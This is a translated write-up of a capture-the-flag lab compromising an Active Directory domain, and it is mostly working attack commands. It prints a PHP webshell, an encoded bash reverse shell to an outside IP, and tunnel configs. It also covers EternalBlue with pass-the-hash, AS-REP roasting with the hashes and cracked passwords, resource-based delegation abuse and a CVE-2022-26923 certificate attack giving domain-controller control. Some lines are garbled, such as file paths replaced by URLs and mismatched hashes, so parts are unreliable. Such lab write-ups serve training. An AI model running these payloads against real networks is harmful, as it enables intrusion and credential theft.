CVE-2022–26923 && RBCD Attack domain controller

NetDing Cup semi-final review target

Target introduction: This target is a review of the 2022 third NetDing Cup final internal network target field. Completing this challenge can help players understand the proxy forwarding, internal network scanning, information collection, privilege escalation, and lateral movement techniques in internal network penetration. It strengthens the understanding of the core authentication mechanism of the domain environment, and masters some interesting technical points in the domain environment penetration. There are a total of 4 flags in this target field, distributed on different target machines.

Initial information collection

At the beginning, an IP address was given 39.101.173.234Check the source code, it is a WordPress framework, versionWordPress 6.4.3

<?=`$_GET[1]`;echo md5(1);?>

Interactive Shell

python3 -c 'import pty; pty.spawn("/bin/bash")'
export SHELL=bash
export TERM=xterm-256color
Ctrl-Z
stty raw -echo;fg
reset (Enter)

frp tunnel

// Server - Run Kali and create the .ini file manually
// https://www.freebuf.com/articles/es/frps -c frps.toml
bindPort = 7000   

//Client - Target
// https://www.freebuf.com/articles/es/frpc -c frpc.toml

serverAddr = "Outbound Machine"
serverPort = 7000

[[proxies]]
name = "socks5"
type = "tcp"
remotePort = 6001

[proxies.plugin]
type = "socks5"

Internal network penetration

Here we scan other internal network hosts and upload afscan collects information

Here is the internal network information, let's analyze it roughly.172.22.15.26This is the target address for this target.172.22.15.24There may be a BlueKeep vulnerability

[*] NetBios: 172.22.15.35 XIAORANG\XR-0687               
[*] NetBios: 172.22.15.13 [+]DC XR-DC01.xiaorang.lab Windows Server 2016 Standard 14393 Domain Controller
[*] 172.22.15.13 (Windows Server 2016 Standard 14393)
[*] NetBios: 172.22.15.24 WORKGROUP\XR-WIN08 Windows Server 2008 R2 Enterprise 7601 Service Pack 1 
[*] NetBios: 172.22.15.18 XR-CA.xiaorang.lab Windows Server 2016 Standard 14393 
[*] WebTitle: http://172.22.15.18 code:200 len:703 title:IIS Windows Server
[*] WebTitle: http://172.22.15.24 code:302 len:0 title:None Redirect URL: http://172.22.15.24/www
[+] http://172.22.15.18 poc-yaml-active-directory-certsrv-detect 
[*] WebTitle: http://172.22.15.24/www/sys/index.php code:200 len:135   title:None

Here we coordinatekalicoordinated to set up anps proxy tunnelNote here: Kali is acting as the server npsand the target is the client npcLink, the target is outgoing...

1=system('%65%63%68%6f%20%22%59%6d%46%7a%61%43%41%74%59%79%41%69%59%6d%46%7a%61%43%41%74%61%53%41%2b%4a%69%41%76%5a%47%56%32%4c%33%52%6a%63%43%38%78%4d%54%45%75%4d%6a%49%35%4c%6a%45%31%4f%43%34%30%4d%43%38%79%4d%7a%4d%7a%49%44%41%2b%4a%6a%45%69%22%7c%62%61%73%65%36%34%20%2d%64%7c%62%61%73%68');
%65%63%68%6f%20%22%59%6d%46%7a%61%43%41%74%59%79%41%69%59%6d%46%7a%61%43%41%74%61%53%41%2b%4a%69%41%76%5a%47%56%32%4c%33%52%6a%63%43%38%78%4d%54%45%75%4d%6a%49%35%4c%6a%45%31%4f%43%34%30%4d%43%38%79%4d%7a%4d%7a%49%44%41%2b%4a%6a%45%69%22%7c%62%61%73%65%36%34%20%2d%64%7c%62%61%73%68
## Directly launch shell

nps tunnel setup

set up asocks5proxy, port is3333, found aOAsystem, tested without holesThis host has enabled445Port, tested with the EternalBlue vulnerability, breaking through the breakthrough and turningkaliSystem, with socks5 proxySuccessfully penetrate the internal network host using the EternalBlue vulnerability

Hash attack EternalBlue

You need to try several times here to obtain the system hash for attack

proxychains psexec.py administrator@172.22.15.24 -hashes ':0e52d03e9b939997401466a0ec5a9cbc' -codec gbk

Find the second flag on the desktopModify the target password and log in to the system to find the password isP@ssw0rd, skipping a step, you can obtain the domain controller user password by hash cracking

AS-REP Roasting

The focus is on AS-REP Roasting, finding users without Kerberos pre-authentication through the GetUserSPNs.py script of the impact project

proxychains GetNPUsers.py -dc-ip 172.22.15.13 -usersfile user.txt xiaorang.lab/

─# cat info.txt 
$krb5asrep$23$lixiuying@xiaorang.lab@XIAORANG.LAB:4edd243c2c1f4bd328ed24246e3ca211$e161952a72cb7ad976a9e89506d436fcd41813ce6f3bf2d8962f57f7c51d37b3bfd72fa100e17ec4042e6b0d71ac1b1b007904d1584aed3fd74014619efd1cfb37f2cbac2dc1af009597798b6945b43635be444cdcbff667af24bcf4bde03eb9c3ce9f6091e5576609319899269e56785612d0100177e3b231a8079b109f8c2177c8497ba01c406820788150f0416ca3d5281b0c07e04fc99e522289acf3cc044caa6f43f352b3814953548080c91a42139b871282dd798b292ba0664ec76421544a827be50120a4ea33171e7b2eb7a6b4ddf71546b2c8dfaa22f429d68ce1407832975ca63c64d77e3a
The encrypted information is: $krb5asrep$23$huachunmei@xiaorang.lab@XIAORANG.LAB:0931e76d1e9d4d6ed6f1d319951c41f4$cae152308b3a0eeb02a237e406e63525e75ee35ef6440f2c7aa5e903f0d429fe312e5eaf8a4ae9a85c1fc388c0661427dfd39d34fb7cdd0fc0db22a702374ef5ad1e6163da0c9b29593b06aba295b6158bf14490a8298f203518b6ae52eceab7d097a05793e553fa5625571b5b9dcadaa45f1b19fab01364c80e0bd75f71124c1a187048d3cbc560f9d83b164a6d9c0b92a278607410b7fdf0da863264587f2f9413b81e9fa3b37221f43ab434245f43143f439ec6c4a4509cd92804de8fd1f7ef76a8329163cb0ffeae217b4499beb0949c76846740d307b4f8e4bc5a3cb604b68ae23cc7425f60d6a51ea3

hashcat -m 18200 --force -a 0 '$krb5asrep$23$lixiuying@xiaorang.lab@XIAORANG.LAB:6ffcf41f6cdd4b4acb52369067cf6c40$2f2e3803acb784f628944d79f36c2f39dbb2b0472b8b004178e3faf5bb4b0c6a98ddcbfe09335a73661abce181afd3c2ae28b29069617bf9e4c71a2f0a7ec7d5243eceee8538d3f13c8e2ffa23e0ba734dd6565949c6c8bc9f22799ae14946084b743d6b7df46fbddbc18903a8cb7f21c95886511809ae62c2a0c2e431d8852c1fcfce5cd96240493bc8110f32eca6895dc23c865431a211a5b9fd1023f57017432da2d47035992efed3a6ca1b3e784679139f73ff0ff26fec51cb6accc3e86e50bbe7e8d86d5df3d93c87a7d54360fc8512c3d8303e6880650f45a9cfad4dd2a4b64f108c64d570d4f5' rockyou.txt

lixiuying@xiaorang.lab/winniethepooh
huachunmei@xiaorang.lab/1qaz2wsx

Remote login:

172.22.15.35
XIAORANG\XR-0687  3389 link login

lixiuying@xiaorang.lab/winniethepooh

CVE-2022–26923 && RBCD Attack domain controller

#Enumerate lixiuying user's DACL on the current machine using powerview

Import-Module .\PowerView.ps1
Get-DomainUser -Identity lixiuying -Properties objectsid
Get-DomainObjectAcl -Identity XR-0687 | ?{$_.SecurityIdentifier -match "S-1-5-21-3745972894-1678056601-2622918667-1131"}


#Add machine user HACK01/Qwer1234 using Powermad

Import-Module .\Powermad.ps1
$Password = ConvertTo-SecureString 'Qwer1234' -AsPlainText -Force
New-MachineAccount -MachineAccount "HACK01" -Password $($Password) -Domain "xiaorang.lab" -DomainController "XR-DC01.xiaorang.lab" -verbose

PS C:\Users\lixiuying\Desktop\11> net group "domain Computers" /domain
This request will be processed by the domain controller of the domain xiaorang.lab.

Group Name     Domain Computers
Comment        All workstations and servers joined to the domain

Member

-------------------------------------------------------------------------------
HACK01            XR-0687            XR-CA

# Add machine account and configure resource delegation
## Method 1:
The machine user HACK01 created next will be added to the msDS-AllowedToActOnBehalfOfOtherIdentity attribute of the machine

# Import module
Import-Module .\PowerView.ps1
# Obtain the SID of HACK01 account
Get-NetComputer "HACK01" -Properties objectsid
Attempt to configure resource constrained delegation from HACK01 to XR-0687
$A = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-3745972894-1678056601-2622918667-1147)"
$SDBytes = New-Object byte[] ($A.BinaryLength)
$A.GetBinaryForm($SDBytes, 0)
Get-DomainComputer XR-0687 | Set-DomainObject -Set @{'msDS-AllowedToActOnBehalfOfOtherIdentity'=$SDBytes} -Verbose
# Check if the configuration is successful
Get-DomainComputer XR-0687 -Properties msDS-AllowedToActOnBehalfOfOtherIdentity

# If you want to clear the msds-allowedtoactonbehalfofotheridentity attribute value, you can clear it with the following command
Set-DomainObject XR-0687 -Clear 'msds-allowedtoactonbehalfofotheridentity' -Verbose

## Method two:
# SharpAllowedToAct.exe tool adds machine accounts and configures resource delegation
SharpAllowedToAct.exe -m HACK01 -p P@$$w0rd -t XR-0687 -a XR-DC01.xiaorang.lab -d xiaorang.lab

Note bug: If there is a repetition here, create a TEST user againHere, execute the connection

export KRB5CCNAME=Administrator.ccache

└─# proxychains -q impacket-psexec -k -no-pass -dc-ip 172.22.15.13 administrator@XR-0687.xiaorang.lab -codec gbk                                                                        

Impacket v0.12.0.dev1+20231015.203043.419e6f24 - Copyright 2023 Fortra

[*] Requesting shares on XR-0687.xiaorang.lab.....
[*] Found writable share ADMIN$
[*] Uploading file ALlkCtIy.exe
[*] Opening SVCManager on XR-0687.xiaorang.lab.....
[*] Creating service fEOz on XR-0687.xiaorang.lab.....
[*] Starting service fEOz.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.20348.1668]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32> 

# The next step is to read the flag

The command is as follows # Privilege escalation based on resource constrained delegation (RBCD)

# Privilege escalation based on resource constrained delegation (RBCD)
echo "172.22.15.35 XR-0687.xiaorang.lab" >> /etc/hosts
# Add machine user hacker1/Admin@123 via impacket-addcomputer
proxychains -q impacket-addcomputer xiaorang.lab/lixiuying:'winniethepooh' -dc-ip 172.22.15.13 -dc-host xiaorang.lab -computer-name 'hacker1$' -computer-pass 'Admin@123'
# Add the SID of the created machine user hacker1 to the msDS-AllowedToActOnBehalfOfOtherIdentity attribute of the XR-0687 machine
proxychains rbcd.py xiaorang.lab/lixiuying:'winniethepooh' -dc-ip 172.22.15.13 -action write -delegate-to 'XR-0687$' -delegate-from 'hacker1$'
# Initiate a resource constraint delegation request for ST ticket
proxychains impacket-getST xiaorang.lab/'hacker1$':'Admin@123' -dc-ip 172.22.15.13 -spn cifs/XR-0687.xiaorang.lab -impersonate Administrator
# Import票据
export KRB5CCNAME=Administrator.ccache
Connect horizontally via psexec without a password
proxychains -q impacket-psexec -k -no-pass -dc-ip 172.22.15.13 administrator@XR-0687.xiaorang.lab -codec gbk                                                                        

AD domain privilege escalation vulnerability (CVE-2022-26923)penetration host 172.22.15.18(XR-CA.xiaorang.lab)The process of integer service vulnerability is as follows: Download:https://github.com/ly4k/Certipy

# Information of hosts file

└─# cat /etc/hosts
172.22.15.35 XR-0687.xiaorang.lab
172.22.15.13 XR-DC01.xiaorang.lab
172.22.15.18 XR-CA.xiaorang.lab

# Install Certipy, solve the error! Download the attachment and execute on Kali directly
python3 setup.py install

# Add domain resolution
echo "172.22.15.13 XR-DC01.xiaorang.lab" >> /etc/hosts
# Use certipy to enumerate the exploitable certificate templates first
proxychains certipy find -u 'lixiuying@xiaorang.lab' -p 'winniethepooh' -dc-ip 172.22.15.13 -vulnerable -stdout
# Create hacker2$ user
proxychains -q certipy account create -user 'spring$' -pass 'Admin@123' -dns XR-DC01.xiaorang.lab -dc-ip 172.22.15.13 -u lixiuying -p 'winniethepooh'
# Create a machine account hacker2 with DNS-Host Name as XR-DC01.xiaorang.lab

proxychains -q certipy req -u 'spring$@xiaorang.lab' -p 'Admin@123' -ca 'xiaorang-XR-CA-CA'

# Convert certificate format, password is empty
openssl pkcs12 -in xr-dc01.pfx -nodes -out test.pem
openssl rsa -in test.pem -out test.key
openssl x509 -in test.pem -out test.crt

Download:https://github.com/AlmondOffSec/PassTheCert/There is an error on the target machine, it is probably that the certificate for smart card authentication has not been installed on the domain controller / Try Schannel to pass the certificate to LDAPS through Schannel, modify LDAP configuration (such as configuring RBCD / DCSync), and then obtain domain controller privilegesDownload the above script

cp passthecert.py https://www.freebuf.com/
chmod +x passthecert.py
# Use the above-generated pfx certificate to configure the domain controller's RBCD, note that you need to export the pfx first to .key and .crt two files
proxychains python3 passthecert.py -action whoami -crt test.crt -key test.key -domain xiaorang.lab -dc-ip 172.22.15.13
proxychains python3 passthecert.py -action write_rbcd -crt test.crt -key test.key -domain xiaorang.lab -dc-ip 172.22.15.13 -delegate-to 'XR-DC01$' -delegate-from 'spring$'
# Finally, grant the RBCD of hacker2 through certificate authentication, request ST ticket as hacker2
# And cross-domain controller via psexec
proxychains -q impacket-getST xiaorang.lab/'spring$':'Admin@123' -dc-ip 172.22.15.13  -spn cifs/XR-DC01.xiaorang.lab -impersonate Administrator

# proxychains -q impacket-getST xiaorang.lab/'spring$':'Admin@123' -dc-ip 172.22.15.13  -spn cifs/XR-DC01.xiaorang.lab -impersonate Administrator

Impacket v0.12.0.dev1+20231015.203043.419e6f24 - Copyright 2023 Fortra

[*] Getting TGT for user
[*] Impersonating Administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in Administrator@cifs_XR-DC01.xiaorang.lab@XIAORANG.LAB.ccache


export KRB5CCNAME=Administrator@cifs_XR-DC01.xiaorang.lab@XIAORANG.LAB.ccache # Import ticket
# Obtain domain controller with psexec
proxychains -q impacket-psexec  -k -no-pass -dc-ip 172.22.15.13 administrator@XR-DC01.xiaorang.lab -codec gbk

Take control of the domain controller host! The author also encountered many bugs in the simulation target test. Be careful, try more, and it will be solved in the end!